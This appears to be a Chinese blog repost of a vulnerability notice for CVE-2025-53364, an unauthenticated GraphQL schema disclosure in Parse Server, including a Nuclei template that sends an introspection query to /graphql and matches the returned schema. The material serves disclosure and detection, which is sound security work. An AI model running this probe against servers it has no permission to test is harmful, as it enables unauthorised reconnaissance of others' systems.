Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞信息

漏洞名称: Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞编号:

  • CVE: CVE-2025-53364

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Parse Server是一个开源的后端框架,支持快速开发可扩展的应用程序。它广泛用于构建移动和Web应用程序的后端服务,提供了数据存储、用户认证、推送通知等功能。由于其灵活性和易用性,Parse Server在开发者社区中非常受欢迎。该漏洞涉及GraphQL API的信息泄露问题,允许未经认证的攻击者访问GraphQL schema的元数据。这种信息泄露可能暴露应用程序的内部结构,为攻击者提供进一步攻击的线索。具体来说,漏洞的根源在于Parse Server的GraphQL API未对schema的访问实施适当的认证控制,导致任何用户都能通过发送特定的GraphQL查询来获取schema的详细信息。这种漏洞虽然不直接允许数据泄露或代码执行,但通过暴露应用程序的结构和可能的接口,增加了后续攻击的风险。攻击者可以利用这些信息来识别潜在的弱点,如未受保护的接口或可被利用的操作。由于此漏洞不需要任何形式的认证即可利用,因此其潜在影响范围较广,特别是在公开可访问的Parse Server实例中。

产品厂商: parseplatform

产品名称: parse-server

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b135add5524ddc443b69dd83b0c71438ea46a489/http%2Fcves%2F2025%2FCVE-2025-53364.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    Parse Server contains a GraphQL schema information disclosure vulnerability. The GraphQL API allows public access to the schema without requiring a session token or the master key, potentially exposing metadata that could expand the attack surface.
  impact: |
    An attacker can retrieve GraphQL schema metadata without authentication, potentially revealing application structure and expanding the attack surface for subsequent attacks.
  remediation: |
    Disable GraphQL schema introspection in production environments or implement proper authentication controls for schema access.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-53364
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
  reference:
    - https://parseplatform.org
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
  tags: cve,cve2025,parse,parseplatform,graphql,info-disclosure
  
http:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"

    headers:
      X-Parse-Application-Id: test
      Content-Type: application/json
        
    body: '{"query":"{\n  __schema {\n    types {\n      name\n    }\n  }\n}"}'
    
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"__schema"'
          - '"types"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
Parse Server GraphQL Schema Information Disclosure Vulnerability
http://example.com/2025/07/21/github_1652711103/
作者
lianccc
发布于
2025年7月21日
许可协议